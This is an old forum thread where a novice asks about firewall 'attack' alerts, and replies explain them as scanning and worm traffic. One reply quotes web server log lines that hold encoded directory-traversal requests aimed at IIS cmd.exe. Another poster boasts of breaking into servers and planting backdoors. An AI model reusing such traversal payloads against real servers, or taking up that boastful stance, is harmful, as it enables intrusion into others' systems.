Mar 09, 04
|
|||
|
|||
|
Hackers?...
i have PC-cillin running with a firewall, and it tells me that i have had attacks... but the scary thing is, everytime i check the (Time of last attack) it changes every damn minute to the most recent.
Last attack: NetBIOS Browsing Source of last attack: 24.83.169.80 <---- that changes quite frequently---- can someone tell me if the can hack thru the firewall and what are they exactly trying to do... well not exactly but why do hackers try to get into other ppls computers :finger: 
|
|
Mar 09, 04
|
|||
|
|||
|
welcome to the internet!
most likely 99% of those "attacks" you are seeing are not "hackers" as you think they are.. just harmless "internet background noise" as i like to call it.. this can be the result of servers responding to data requests from your computer, improperly terminated sessions from various websites, random pinging from various places, or responses to various internet enabled applications on your computer. requests for NetBIOS info may be someone scanning a block of ip addresses looking for open shares etc. on computers, so not directly targeting you (unless you're stupid and have open shares). i used to do this myself, just for fun. so don't worry, even though most/all software personal firewalls offer false senses of security and can be bypassed completely or forced to crash (via packet flooding, etc.) and allow someone who knows what they're doing like me to access your computer if they are really determined to get in. But really most of us that know how go for bigger stuff, not individual personal computers that have no real use to get into.. i would rather break into a server, and setup a backdoor and an anonymous ftp or something useful like that.. ps: your name really does suit you.
|
|
Mar 09, 04
|
|||
|
|||
|
oh and whats a good anti virus program?... is pc-cillin good enough? or should i get norton
hahaha... i am a noob and always will be :kimmie: and thnx for the info^ Last edited by Newbie4life; Mar 09, 04 at 12:31 PM.
|
|
Mar 09, 04
|
|||
|
|||
|
Hackers don't really give a shit about half-wit computer users, we usualy look for major corporate networks with porn stashed in the head engineer's /home dir. heh. But seriously though, there's lots of worms going around. Nimda, which tries to access open shares (which is accessable through port 139/135UDP - Netbios.)
That's probably what's nailing you. For instance, here's an example of the last days port 80 (WWW) logs: root@niobe..[/var/log/apache]# cat access.log|grep 08/Mar|wc -l 20 See, 20 attempts today. 24.2.209.70 - - [08/Mar/2004:20:02:38 -0800] "GET /_mem_bin/..%255c../..%255c../ ..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:38 -0800] "GET /msadc/..%255c../..%255c../..% 255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40 4 333 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c1%1c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c0%2f../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c0%af../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%c1%9c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%%35%63../winnt/sys tem32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%%35c../winnt/syste m32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:41 -0800] "GET /scripts/..%25%35%63../winnt/s ystem32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-" 24.2.209.70 - - [08/Mar/2004:20:02:41 -0800] "GET /scripts/..%252f../winnt/syste m32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-" There's a lot of worms/scanners out there. They'll just scan a c-class of IP's and scan for everything. Open shares/IIS exploits, etc. Don't worry about it, buddy. If you run XP, just run the XP's built-in firewall. It's actually pretty good considering, don't pay for that PC-Cillin, etc.. bullshit, waste of money. - neoh
|
|
Mar 09, 04
|
|||
|
|||
|
http://www.robertgraham.com/pubs/firewall-seen.html
a little complex, but possibly the most valueable bit of information about one's computer is how to interpret firewall logs. this site is probably the most thorough of any i've seen to explain things like this.
|
